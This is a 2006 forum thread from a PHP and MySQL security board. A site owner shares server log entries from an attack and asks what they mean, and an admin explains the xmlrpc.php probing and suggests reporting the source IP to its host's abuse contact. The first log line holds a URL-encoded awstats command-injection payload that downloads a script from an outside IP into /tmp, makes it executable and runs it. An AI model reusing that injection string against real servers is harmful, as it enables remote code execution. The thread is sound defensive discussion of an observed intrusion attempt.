Board index   FAQ   Search  
Register  Login
Board index php forum :: PHP and MySQL Security PHP & MySQL Security

Need Help

Security issues related to php and mysql usage. How to make your code secure? Security measures and configurations? It's all in here!

Moderators: macek, egami, gesf

Need Help

Postby Thamer » Sat Feb 18, 2006 3:00 pm

:?
Hi all , I am a new member of this Big Forum ,,

I was looking for some information to know something about hacker attacks !!

How can I discover everything about these attacks ( The Hacker info ) ,
and the Vulnerabilities that the hacker was trying to find ? and what are they about ?



[b - [17/Feb/2006:14:28:43 +0100] “GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|HTTP/1.1”404 295

- [17/Feb/2006:14:28:43 +0100] “POST /xmlrpc.php HTTP/1.1”404 287
- [17/Feb/2006:14:28:43 +0100] “POST/blog/xmlrpc.php HTTP/1.1”404 292
- [17/Feb/2006:14:28:43 +0100] “POST/blog/xmlsrv/xmlrpc.php HTTP/1.1”
- [17/Feb/2006:14:28:43 +0100] “POST/drupal/xmlrpc.php HTTP/1.1” 404 294
- [17/Feb/2006:14:28:43 +0100] “POST/phpgroupware/xmlrpc.php HTTP/1.1”
- [17/Feb/2006:14:28:43 +0100] “POST /wordpress/xmlrpc.php HTTP/1.1” 404
- [17/Feb/2006:14:28:43 +0100] “POST/xmlrpc.php HTTP/1.1” 404 287[/b]


Kind reagards,

Thamer

[/img]
Thamer
New php-forum User
New php-forum User
 
Posts: 2
Joined: Sat Feb 18, 2006 1:18 pm
Location: United Kingdom

Postby Alexej Kubarev » Sat Feb 18, 2006 3:15 pm

XML-RPC is a XML Repote Proceedure Call.

This is used in frmaeworks like drupal pretty often. The vulnerability? well, mostly they were trying "something"
There might by some vulnerability in older versions but im not sure about that. wordpress had some problem as i recall
User avatar
Alexej Kubarev
Site Admin
Site Admin
 
Posts: 2223
Joined: Fri Mar 05, 2004 7:15 am
Location: Täby, Stockholms län

Postby Thamer » Sun Feb 19, 2006 2:45 am

Thanks Alexei for your reply :)

but how can I know some information about this hacker ? or any software thats gives me some

202.8.85.234 - - [17/Feb/2006:14:28:43 +0100]

again .. many thanks :oops:
Thamer
New php-forum User
New php-forum User
 
Posts: 2
Joined: Sat Feb 18, 2006 1:18 pm
Location: United Kingdom

Postby Alexej Kubarev » Sun Feb 19, 2006 5:10 am

oh well this is pretty fun as http://202.8.85.234
will let you come to a webhosting company or something
atleast its powered by ISPConfig, an opensourse ISP and hosting managemennt CP.

so it will be hard to know who did that.. however you way want to try to fins the webhotel and send an email to an abuse center of that webhotel.
User avatar
Alexej Kubarev
Site Admin
Site Admin
 
Posts: 2223
Joined: Fri Mar 05, 2004 7:15 am
Location: Täby, Stockholms län


Return to PHP & MySQL Security

Who is online

Users browsing this forum: No registered users and 1 guest

Sponsored by Sitebuilder Web hosting and Traduzioni Italiano Rumeno and antispam for cPanel.

cron